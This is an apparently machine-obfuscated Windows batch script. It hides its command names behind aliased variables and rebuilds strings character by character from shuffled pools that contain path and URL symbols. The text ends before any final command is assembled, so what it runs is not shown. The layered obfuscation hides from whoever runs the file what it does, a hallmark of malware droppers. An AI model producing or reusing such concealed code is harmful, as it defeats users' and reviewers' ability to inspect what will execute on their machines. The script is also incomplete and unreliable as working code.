@echo off
setlocal enabledelayedexpansion
chcp 65001 >nul
set "m__Oll_lOl0I=goto"
set "p1__Ol00_lll0=m__Oll_lOl0I"
set "p2_I0II0l_0Il=p1__Ol00_lll0"
set "m_l_000_0lll=rem"
set "p1__lIOl__0II=m_l_000_0lll"
set "p2__O0IlII_0I=p1__lIOl__0II"
set "m_O0OO_lI__O=title"
set "p1__0__I000__=m_O0OO_lI__O"
set "p2__lIlIlI00_=p1__0__I000__"
set "m__IO0I__Il0=echo"
set "p1_lO00l_lIO_=m__IO0I__Il0"
set "p2_O0_0I0_I_0=p1_lO00l_lIO_"
set "m__O00OI0OlO=exit"
set "p1_Ol00lIlO_l=m__O00OI0OlO"
set "p2_IlII_0l0lO=p1_Ol00lIlO_l"
set "m_IOO0_O0llI=set"
set "p1_I_lO_O0OIl=m_IOO0_O0llI"
set "p2_III0_IIOOO=p1_I_lO_O0OIl"
set "m_O_OIOO0OIO=call"
set "p1_l_Illl0__l=m_O_OIOO0OIO"
set "p2_OIIO0l_O__=p1_l_Illl0__l"
set "m_llOIOOOlll=chcp"
set "p1_l_l__l_Il_=m_llOIOOOlll"
set "p2_l_O_O0IllI=p1_l_l__l_Il_"
set "m__l_lII_0I_=pause"
set "p1_l_IllIl0ll=m__l_lII_0I_"
set "p2_____l_O_O_=p1_l_IllIl0ll"
set "v_l_l_0OIO00Il=lI0OOl000OII"
set "v_l_Ol_0O0O_00=Il_I0IO0II_O"
set "v_l_O0OO_IllII=I0lO_lO_II00"
set "v_l_II_0llII_I=l_000O0_0_Ol"
set "v_l_I00O__Il_O=LB_EXIT_II0_0lOO"
set "pool_OOl_0ll_=WO1xw9my6RTYSPk4HFh-b2tciqL@D.Vz0NMlEfU53dpBCX8_os7eJ:ZnuIjQragK/GA\v"
set /a "IllOOO=((39-28)+24)" & rem MNH~BENBDsAWFe1
set /a "IO_IIO=((0*3)+(17-17))"
for /f "tokens=2 delims==" %%A in ('set IllOOO') do for /f "tokens=2 delims==" %%C in ('set IO_IIO') do call set "pool_OOl_0ll_=%%pool_OOl_0ll_:~%%A%%%%%%pool_OOl_0ll_:~%%C,%%A%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:S=#ZLOFLBTJAR#%%" & rem ++4$pdHlf?dX#
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:n=S%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:#ZLOFLBTJAR#=n%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:m=#SQXCC#%%" & rem VfwdC3p-dv{Jp{:XT
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:_=m%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:#SQXCC#=_%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:j=#MZNXTM#%%" & rem y5$vOeY}9OPB
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:d=j%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:#MZNXTM#=d%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:Z=#EMMLVYZJID#%%" & rem C9Kxpr7.U$LM~Uq
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:-=Z%%"
call set "pool_OOl_0ll_=%%pool_OOl_0ll_:#EMMLVYZJID#=-%%"
set /a "lO000_=((((-51+18)+33)*5)+4)" & rem sY/mO/GKGtXT8u?SkUV
set /a "I__O0O=(((-2-31)+33)+(28-28))"
for /f "tokens=2 delims==" %%A in ('set lO000_') do for /f "tokens=2 delims==" %%C in ('set I__O0O') do call set "pool_OOl_0ll_=%%pool_OOl_0ll_:~%%A%%%%%%pool_OOl_0ll_:~%%C,%%A%%"
set /a "IOOl_0=((-36+28)+44)" & rem l,bAX4wb]Bc~Wb-X6
set /a "lIIllO=(((-37-10)+47)+(1-1))"
for /f "tokens=2 delims==" %%A in ('set IOOl_0') do for /f "tokens=2 delims==" %%C in ('set lIIllO') do call set "pool_OOl_0ll_=%%pool_OOl_0ll_:~%%A%%%%%%pool_OOl_0ll_:~%%C,%%A%%"
set "v_j_O_0OIO=!pool_OOl_0ll_:~0,1!"
if "!v_j_O_0OIO!"=="_" (call :L_DISPATCH)

set "pool_IO0IO_OI=:OAZfRBw83GNzp/dK0c7la16Fb9U2Vynj4.LHi-5XmMJIoTqtDWr@sevPQYk\u_SgChEx"
set /a "I0l0_l=((19+40)+(22-22))" & rem #,#jTS5ws5N3nLm
set /a "OI0O_l=(((83-43)-40)+(27-27))"
for /f "tokens=2 delims==" %%A in ('set I0l0_l') do for /f "tokens=2 delims==" %%C in ('set OI0O_l') do call set "pool_IO0IO_OI=%%pool_IO0IO_OI:~%%A%%%%%%pool_IO0IO_OI:~%%C,%%A%%"
set /a "I00OI0=((((2*6)+1)*3)+2)" & rem hGp2g;gNgEU[c4s;$I
set /a "IO_l_0=((0*5)*6)"
for /f "tokens=2 delims==" %%A in ('set I00OI0') do for /f "tokens=2 delims==" %%C in ('set IO_l_0') do call set "pool_IO0IO_OI=%%pool_IO0IO_OI:~%%A%%%%%%pool_IO0IO_OI:~%%C,%%A%%"
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:2=#UFBSMTA#%%" & rem B:3SogMbTNzm}@
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:P=2%%"
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:#UFBSMTA#=P%%"
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:_=#TORSFTPFDI#%%" & rem 8b0C.U+v#6bu/wLa
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:Z=_%%"
call set "pool_IO0IO_OI=%%pool_IO0IO_OI:#TORSFTPFDI#=Z%%"
set /a "IIl00I=((((1*6)+4)*3)+1)" & rem =r4LN0[+?04Oo9Pr{w2
set /a "I_0l_I=(33-33)"
for /f "tokens=2 delims==" %%A in ('set IIl00I') do for /f "tokens=2 delims==" %%C in ('set I_0l_I') do call set "pool_IO0IO_OI=%%pool_IO0IO_OI:~%%A%%%%%%pool_IO0IO_OI:~%%C,%%A%%"
set /a "_l__I0=(((46-2)+18)+(8-8))" & rem 3v6j-Fca/OUYhr.
set /a "l00_OO=(-14+14)"
for /f "tokens=2 delims==" %%A in ('set _l__I0') do for /f "tokens=2 delims==" %%C in ('set l00_OO') do call set "pool_IO0IO_OI=%%pool_IO0IO_OI:~%%A%%%%%%pool_IO0IO_OI:~%%C,%%A%%"
set /a "II0III=(-5+48)" & rem 503EeFHvds-v
set /a "_OIO0I=(((-29+31)-2)+(16-16))"
for /f "tokens=2 delims==" %%A in ('set II0III') do for /f "tokens=2 delims==" %%C in ('set _OIO0I') do call set "pool_IO0IO_OI=%%pool_IO0IO_OI:~%%A%%%%%%pool_IO0IO_OI:~%%C,%%A%%"
set "v_j__OI_lO=!pool_IO0IO_OI:~0,1!"
if "!v_j__OI_lO!"=="_" (call :L_DISPATCH)

set "pool_II_00lOI=kc8sSK6f3hR:U/i4mDBYPj1t@AezaXOVLodWH97_g5u0bnN-xFGpw.2T\vyZlQCEMqJrI"
set /a "IOlOIO=(((1*4)+3)+35)" & rem J8a5pr@r{k6AUJD,sxI
set /a "IO0IO0=(-36+36)"
for /f "tokens=2 delims==" %%A in ('set IOlOIO') do for /f "tokens=2 delims==" %%C in ('set IO0IO0') do call set "pool_II_00lOI=%%pool_II_00lOI:~%%A%%%%%%pool_II_00lOI:~%%C,%%A%%"
call set "pool_II_00lOI=%%pool_II_00lOI:x=#ZYRALZEAB#%%" & rem z_.oW7fVn}[ot_
call set "pool_II_00lOI=%%pool_II_00lOI:U=x%%"
call set "pool_II_00lOI=%%pool_II_00lOI:#ZYRALZEAB#=U%%"
call set "pool_II_00lOI=%%pool_II_00lOI:M=#VZFVZLDOG#%%" & rem 1e={#69mS=
call set "pool_II_00lOI=%%pool_II_00lOI:V=M%%"
call set "pool_II_00lOI=%%pool_II_00lOI:#VZFVZLDOG#=V%%"
set /a "IO0I0I=(((((-4*4)+1)*2)+1)+43)" & rem MOX36dyIjx[g
set /a "lIO0l0=(((-31+15)-3)+19)"
for /f "tokens=2 delims==" %%A in ('set IO0I0I') do for /f "tokens=2 delims==" %%C in ('set lIO0l0') do call set "pool_II_00lOI=%%pool_II_00lOI:~%%A%%%%%%pool_II_00lOI:~%%C,%%A%%"
call set "pool_II_00lOI=%%pool_II_00lOI:E=#YWAGJSGB#%%" & rem i0zrnr9W_4igOAM?
call set "pool_II_00lOI=%%pool_II_00lOI:c=E%%"
call set "pool_II_00lOI=%%pool_II_00lOI:#YWAGJSGB#=c%%"
set /a "ll_O_I=(-28+46)" & rem ~2W:s6NE#E7M]89
set /a "O0OOl0=(((31-40)+24)-15)"
for /f "tokens=2 delims==" %%A in ('set ll_O_I') do for /f "tokens=2 delims==" %%C in ('set O0OOl0') do call set "pool_II_00lOI=%%pool_II_00lOI:~%%A%%%%%%pool_II_00lOI:~%%C,%%A%%"
call set "pool_II_00lOI=%%pool_II_00lOI:n=#FRTZMZS#%%" & rem 1vx;LwUoURxu
call set "pool_II_00lOI=%%pool_II_00lOI:z=n%%"
call set "pool_II_00lOI=%%pool_II_00lOI:#FRTZMZS#=z%%"
set "v_j_OOIlOO=!pool_II_00lOI:~0,1!"
if "!v_j_OOIlOO!"=="I" (call :L_DISPATCH)

set /a "v_i_lI0I0l=(65-26)"
set "v_p__lOOO0IlO_=v_l_Ol0_lOIOI_"
for /f "tokens=2 delims==" %%I in ('set v_i_lI0I0l') do for /f "delims=" %%A in ("!v_p__lOOO0IlO_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_Ol__I_l_II=!v_l_Ol0_lOIOI_!"
set /a "v_i_lIOlO_=((((-52+36)+43)*2)+1)"
set "v_p_IIl_0lOIO_=v_l_lI_IIIlO_0"
for /f "tokens=2 delims==" %%I in ('set v_i_lIOlO_') do for /f "delims=" %%A in ("!v_p_IIl_0lOIO_!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_IIl0llII00=!v_l_lI_IIIlO_0!"
set /a "v_i_llO_lI=((15*3)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_llO_lI') do call set "v_l_l__OI_O000=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lIlOIOl0_0=!v_l_l__OI_O000!"
set /a "v_i___OI_I=((71-32)+(14-14))"
for /f "tokens=2 delims==" %%I in ('set v_i___OI_I') do call set "v_l_I_lOII0IIO=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IO_lIOO_lI=!v_l_I_lOII0IIO!"
set /a "v_i__Ol0O_=(((148-34)-47)-14)"
for /f "tokens=2 delims==" %%I in ('set v_i__Ol0O_') do call set "v_l_Il0_llIllO=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_I00OlIIO_l=!v_l_Il0_llIllO!"
set /a "v_i__0Ol__=((14-8)+(22-22))"
set "v_p_lOlOOO_IOO=v_l_ll_lOlIll0"
for /f "tokens=2 delims==" %%I in ('set v_i__0Ol__') do for /f "delims=" %%A in ("!v_p_lOlOOO_IOO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OllOOOOOO0=!v_l_ll_lOlIll0!"
set /a "v_i_lIO_OI=(((((2*5)+3)*5)+2)+(29-29))"
for /f "tokens=2 delims==" %%I in ('set v_i_lIO_OI') do call set "v_l_Ol_III0lll=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_llO_O0lIOO=!v_l_Ol_III0lll!"
set /a "v_i_l__IOO=((((6*2)*4)+1)+(6-6))"
for /f "tokens=2 delims==" %%I in ('set v_i_l__IOO') do call set "v_l_O0__llOIl_=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l0000IOOO_=!v_l_O0__llOIl_!"
set /a "v_i_O00OIl=(((9*4)+2)+(1-1))"
for /f "tokens=2 delims==" %%I in ('set v_i_O00OIl') do call set "v_l__II_00l0_0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IOlIlIOO0_=!v_l__II_00l0_0!"
set /a "v_i__0l__I=((((2*5)*2)+29)+(6-6))"
for /f "tokens=2 delims==" %%I in ('set v_i__0l__I') do call set "v_l_l0lI_lll0O=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_OO0OOlI0lI=!v_l_l0lI_lll0O!"
set /a "v_i_O0IO0l=(7*6)"
set "v_p_IlOO__III0=v_l_lI_0Ol__0I"
for /f "tokens=2 delims==" %%I in ('set v_i_O0IO0l') do for /f "delims=" %%A in ("!v_p_IlOO__III0!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_I0l00IlOIO=!v_l_lI_0Ol__0I!"
set /a "v_i_IOlO0_=(((28-12)*2)+(17-17))"
set "v_p__OIlO___0l=v_l_l00lIlOlI_"
for /f "tokens=2 delims==" %%I in ('set v_i_IOlO0_') do for /f "delims=" %%A in ("!v_p__OIlO___0l!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O0lOI_O__0=!v_l_l00lIlOlI_!"
set /a "v_i_O0l_OI=((26-26)+(17-17))"
for /f "tokens=2 delims==" %%I in ('set v_i_O0l_OI') do call set "v_l__IOllII0lO=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O_OOI00Il0=!v_l__IOllII0lO!"
set /a "v_i_OI000O=(((-11*2)+28)+11)"
set "v_p__lOlI_I0__=v_l_Ol0_l0IOI0"
for /f "tokens=2 delims==" %%I in ('set v_i_OI000O') do for /f "delims=" %%A in ("!v_p__lOlI_I0__!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OI0OO_0__I=!v_l_Ol0_l0IOI0!"
set /a "v_i_IOIlI0=8"
for /f "tokens=2 delims==" %%I in ('set v_i_IOIlI0') do call call call set "v_c__lII0OOO_I=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i_OIIIl_=(39+27)"
for /f "tokens=2 delims==" %%I in ('set v_i_OIIIl_') do call set "v_l_OI_000IllI=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_I_I_0_lOOl=!v_l_OI_000IllI!"
set /a "v_i_OOlOOl=((((-40+14)+11)+37)+(11-11))"
set "v_p_l0I0OI_lIO=v_l_OOl0l0O__0"
for /f "tokens=2 delims==" %%I in ('set v_i_OOlOOl') do for /f "delims=" %%A in ("!v_p_l0I0OI_lIO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__00_0_OlI_=!v_l_OOl0l0O__0!"
set /a "v_i_II_lO_=(((2*6)+5)+(8-8))"
set "v_p_Ol0O00l0O0=v_l_IOIIO_0l00"
for /f "tokens=2 delims==" %%I in ('set v_i_II_lO_') do for /f "delims=" %%A in ("!v_p_Ol0O00l0O0!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IO_0I0II00=!v_l_IOIIO_0l00!"
set /a "v_i_lO_0_l=((6*2)+(30-30))"
for /f "tokens=2 delims==" %%I in ('set v_i_lO_0_l') do call set "v_l_lOl0OII0lI=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_lOI0_0_000=!v_l_lOl0OII0lI!"
set /a "v_i_lO_l_l=(((-12+12)*5)+2)"
set "v_p_llO_0II0II=v_l_lO_lO0IO_I"
for /f "tokens=2 delims==" %%I in ('set v_i_lO_l_l') do for /f "delims=" %%A in ("!v_p_llO_0II0II!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_ll_I_0_O_0=!v_l_lO_lO0IO_I!"
set /a "v_i_I0I0OI=(((((8+25)-21)*5)+2)+(28-28))"
set "v_p_IIO_O_ll_0=v_l_O000OII_lI"
for /f "tokens=2 delims==" %%I in ('set v_i_I0I0OI') do for /f "delims=" %%A in ("!v_p_IIO_O_ll_0!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_l_0l0_I0I_=!v_l_O000OII_lI!"
set /a "v_i__0OlII=((((31+19)-45)*4)+1)"
set "v_p_lIIlI0_0_l=v_l___0__O__0l"
for /f "tokens=2 delims==" %%I in ('set v_i__0OlII') do for /f "delims=" %%A in ("!v_p_lIIlI0_0_l!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OOI_0l0_ll=!v_l___0__O__0l!"
set /a "v_i_O__0OI=(((-31+37)*3)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_O__0OI') do call set "v_l_Ol00lOIO0O=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OOl0_IO0O_=!v_l_Ol00lOIO0O!"
set /a "v_i_OIIIlI=(((((26-33)*5)+2)+41)+(23-23))"
set "v_p_Il___l__IO=v_l_IlOII_Ill0"
for /f "tokens=2 delims==" %%I in ('set v_i_OIIIlI') do for /f "delims=" %%A in ("!v_p_Il___l__IO!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_O_0_0l0O0I=!v_l_IlOII_Ill0!"
set /a "v_i_I0O0OO=(((84-17)-42)+(6-6))"
set "v_p_I0000Il0lO=v_l_l0_OIl0l0O"
for /f "tokens=2 delims==" %%I in ('set v_i_I0O0OO') do for /f "delims=" %%A in ("!v_p_I0000Il0lO!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_l_l_0IIIIl=!v_l_l0_OIl0l0O!"
set /a "v_i_lO0IOO=((13*3)+1)"
set "v_p_OOO__I0000=v_l__OIOIlI0ll"
for /f "tokens=2 delims==" %%I in ('set v_i_lO0IOO') do for /f "delims=" %%A in ("!v_p_OOO__I0000!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_IlO00II_I_=!v_l__OIOIlI0ll!"
set /a "v_i_llIII0=(((24-8)-6)*4)"
for /f "tokens=2 delims==" %%I in ('set v_i_llIII0') do call set "v_l___OIO00___=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l_0l0IlOOI=!v_l___OIO00___!"
set /a "v_i_I_l0IO=(((-25+33)*5)+3)"
set "v_p_Il0l__Il00=v_l_OIOllIOIOI"
for /f "tokens=2 delims==" %%I in ('set v_i_I_l0IO') do for /f "delims=" %%A in ("!v_p_Il0l__Il00!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c__OlOI_ll__=!v_l_OIOllIOIOI!"
set /a "v_i_OO_IOI=(((4+2)*5)+(25-25))"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_IOI') do call set "v_l_OIO_III_O_=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_Ol_lI0lO_l=!v_l_OIO_III_O_!"
set /a "v_i__0_OI0=((9+15)+2)"
set "v_p_OIIlIIOl_I=v_l_O____l_IlO"
for /f "tokens=2 delims==" %%I in ('set v_i__0_OI0') do for /f "delims=" %%A in ("!v_p_OIIlIIOl_I!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O0_I__0OI_=!v_l_O____l_IlO!"
set /a "v_i__IOlOI=((58+7)+(27-27))"
set "v_p_l0O0l_O0Il=v_l_OOI_O_Il_0"
for /f "tokens=2 delims==" %%I in ('set v_i__IOlOI') do for /f "delims=" %%A in ("!v_p_l0O0l_O0Il!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_IllOlOOl0l=!v_l_OOI_O_Il_0!"
set /a "v_i_IIl0OI=((((23+5)-15)*4)+(16-16))"
for /f "tokens=2 delims==" %%I in ('set v_i_IIl0OI') do call set "v_l_ll_I_0l_lO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IO__lOOIll=!v_l_ll_I_0l_lO!"
set /a "v_i_OI__Ol=((((65-31)-28)*5)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_OI__Ol') do call set "v_l_llO0_OO__l=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lI0Il00Oll=!v_l_llO0_OO__l!"
set /a "v_i_lOl_ll=((((-51+24)+35)*4)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_lOl_ll') do call set "v_l__0l0llOI0_=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_O00_I__I_O=!v_l__0l0llOI0_!"
set /a "v_i_l0OOl0=((106-39)+(19-19))"
for /f "tokens=2 delims==" %%I in ('set v_i_l0OOl0') do call set "v_l__l0lOIl0_0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_O0_I0l0_I_=!v_l__l0lOIl0_0!"
set /a "v_i__O_IIO=((((((2*2)*2)+1)*4)+1)+(23-23))"
for /f "tokens=2 delims==" %%I in ('set v_i__O_IIO') do call set "v_l_OOO0000IOl=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__0l__0lI_I=!v_l_OOO0000IOl!"
set /a "v_i_I_OlOO=(((((1*5)+2)*6)+2)+(9-9))"
set "v_p_l0IIO_OIIO=v_l_I0lO__I00l"
for /f "tokens=2 delims==" %%I in ('set v_i_I_OlOO') do for /f "delims=" %%A in ("!v_p_l0IIO_OIIO!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OlOII0OI_0=!v_l_I0lO__I00l!"
set /a "v_i_O0OI_l=(47-30)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0OI_l') do call call call set "v_c_llOlll_Il0=%%COMSPEC:~%%I,1%%"
set /a "v_i_IO__IO=((((-19-1)+29)*5)+4)"
for /f "tokens=2 delims==" %%I in ('set v_i_IO__IO') do call set "v_l_O_lOllO0II=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OI_I0_0IO_=!v_l_O_lOllO0II!"
set /a "v_i_II_OI_=((((9*6)+5)-19)+6)"
for /f "tokens=2 delims==" %%I in ('set v_i_II_OI_') do call set "v_l_OO__0_IO_l=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c__IOO_O_OO_=!v_l_OO__0_IO_l!"
set /a "v_i___0O_O=(((-13+18)*6)-28)"
set "v_p_lIO00_00II=v_l__lIIO_O_I0"
for /f "tokens=2 delims==" %%I in ('set v_i___0O_O') do for /f "delims=" %%A in ("!v_p_lIO00_00II!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O00_0I0_II=!v_l__lIIO_O_I0!"
set /a "v_i_II0__l=((60+4)+(27-27))"
set "v_p_O_l0ll0I_O=v_l__lO00lO0I_"
for /f "tokens=2 delims==" %%I in ('set v_i_II0__l') do for /f "delims=" %%A in ("!v_p_O_l0ll0I_O!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__0O_OIl0_I=!v_l__lO00lO0I_!"
set /a "v_i_l0_OIO=(107-46)"
set "v_p_OOlIOOIl0I=v_l_O0IlIOlI00"
for /f "tokens=2 delims==" %%I in ('set v_i_l0_OIO') do for /f "delims=" %%A in ("!v_p_OOlIOOIl0I!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_lll_lll0OO=!v_l_O0IlIOlI00!"
set /a "v_i__0ll0_=((16*4)-45)"
for /f "tokens=2 delims==" %%I in ('set v_i__0ll0_') do call set "v_l_I_I0_IOIII=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_OO0O0O0_0l=!v_l_I_I0_IOIII!"
set /a "v_i_OlIlII=(((((-5*6)+4)+30)*4)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_OlIlII') do call call call set "v_c___0___0l0_=%%%%pool_II_00lOI:~%%I,1%%%%"
set /a "v_i__l_Oll=(((9+9)*2)-15)"
set "v_p_l0lIIllII_=v_l__ll0O_OOIO"
for /f "tokens=2 delims==" %%I in ('set v_i__l_Oll') do for /f "delims=" %%A in ("!v_p_l0lIIllII_!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_O___OI0_O_=!v_l__ll0O_OOIO!"
set /a "v_i_IlIlOl=(((45-39)-3)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_IlIlOl') do call call call set "v_c_Il0OIIIl_l=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set /a "v_i_IO_0ll=((((15*5)+2)-23)-17)"
set "v_p_I_OIlI0_O_=v_l_IIIl0OIlOO"
for /f "tokens=2 delims==" %%I in ('set v_i_IO_0ll') do for /f "delims=" %%A in ("!v_p_I_OIlI0_O_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_II0O0lO00I=!v_l_IIIl0OIlOO!"
set /a "v_i_OO_lOl=((((7+17)*3)+2)-32)"
set "v_p__0__OIIOIl=v_l_ll0OIIl_0O"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_lOl') do for /f "delims=" %%A in ("!v_p__0__OIIOIl!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_Ill0lIl__0=!v_l_ll0OIIl_0O!"
set /a "v_i_I0_0I_=((((18*6)+2)-46)-2)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0_0I_') do call set "v_l_OI0_I__II0=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_lOO0___II0=!v_l_OI0_I__II0!"
set /a "v_i_O_IOOI=(13+39)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_IOOI') do call set "v_l___O__Ol_0_=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_l0OO00OO00=!v_l___O__Ol_0_!"
set /a "v_i__0OIOl=((((-40-1)+43)*6)+4)"
for /f "tokens=2 delims==" %%I in ('set v_i__0OIOl') do call set "v_l_IIO0lO0ll_=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c___IOIOI_l_=!v_l_IIO0lO0ll_!"
set /a "v_i_Ol0_I_=18"
set "v_p_II_l0__IlI=v_l__OlOlIOOl_"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol0_I_') do for /f "delims=" %%A in ("!v_p_II_l0__IlI!") do call set "%%A=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c___l00I_OOl=!v_l__OlOlIOOl_!"
set /a "v_i__O_0_l=((-18+21)+50)"
set "v_p_IO_0I_0O__=v_l_OO_0_l00lI"
for /f "tokens=2 delims==" %%I in ('set v_i__O_0_l') do for /f "delims=" %%A in ("!v_p_IO_0I_0O__!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_III_O_l0lO=!v_l_OO_0_l00lI!"
set /a "v_i_O0__Il=((64-25)+(13-13))"
for /f "tokens=2 delims==" %%I in ('set v_i_O0__Il') do call set "v_l_O0lIOIIO_I=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c_II__0I_I_I=!v_l_O0lIOIIO_I!"
set /a "v_i_OO_lII=((2*5)-10)"
set "v_p_I0lI_OlOO_=v_l_I_l__OlllI"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_lII') do for /f "delims=" %%A in ("!v_p_I0lI_OlOO_!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_OO0I_Il0OI=!v_l_I_l__OlllI!"
set /a "v_i___lOI0=((9-9)+(26-26))"
for /f "tokens=2 delims==" %%I in ('set v_i___lOI0') do call set "v_l_l__0l_l_O0=%%%%pool_OOl_0ll_:~%%I,1%%%%"
set "v_c__0_O00OlOO=!v_l_l__0l_l_O0!"
set /a "v_i_O_IOl_=(68-37)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_IOl_') do call set "v_l_IO0OO0lIOl=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c__l_0IlI_I_=!v_l_IO0OO0lIOl!"
set /a "v_i___O0I0=(((-18+20)*6)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i___O0I0') do call set "v_l__O0llOOllO=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c___II0II0l_=!v_l__O0llOOllO!"
set /a "v_i_l_0lIl=((((24+27)+26)-11)+(12-12))"
for /f "tokens=2 delims==" %%I in ('set v_i_l_0lIl') do call set "v_l_lII_ll_I_0=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_IllllOOI00=!v_l_lII_ll_I_0!"
set /a "v_i_lIOOl0=((14*3)+(2-2))"
set "v_p_I0OlI_000I=v_l_OIllO_0OlO"
for /f "tokens=2 delims==" %%I in ('set v_i_lIOOl0') do for /f "delims=" %%A in ("!v_p_I0OlI_000I!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_OIOI000l_0=!v_l_OIllO_0OlO!"
set /a "v_i__IOI0_=((-58+24)+40)"
set "v_p_l_I00IO0OO=v_l___IIlI_Oll"
for /f "tokens=2 delims==" %%I in ('set v_i__IOI0_') do for /f "delims=" %%A in ("!v_p_l_I00IO0OO!") do call set "%%A=%%%%pool_II_00lOI:~%%I,1%%%%"
set "v_c_I0O0_000O_=!v_l___IIlI_Oll!"
set /a "v_i_lII_I0=((35+29)+(2-2))"
for /f "tokens=2 delims==" %%I in ('set v_i_lII_I0') do call call call set "v_c___00OIIll0=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set /a "v_i_ll_OII=((46-46)+(29-29))"
set "v_p_l_IIOI_I_l=v_l___l_lIl_lI"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_OII') do for /f "delims=" %%A in ("!v_p_l_IIOI_I_l!") do call set "%%A=%%%%pool_IO0IO_OI:~%%I,1%%%%"
set "v_c_l_l0OOI0__=!v_l___l_lIl_lI!"
set /a "v_i_O0OO_l=(((31-35)+9)+(4-4))"
for /f "tokens=2 delims==" %%I in ('set v_i_O0OO_l') do call call call set "v_c_l0O_lO0OO0=%%%%pool_II_00lOI:~%%I,1%%%%"
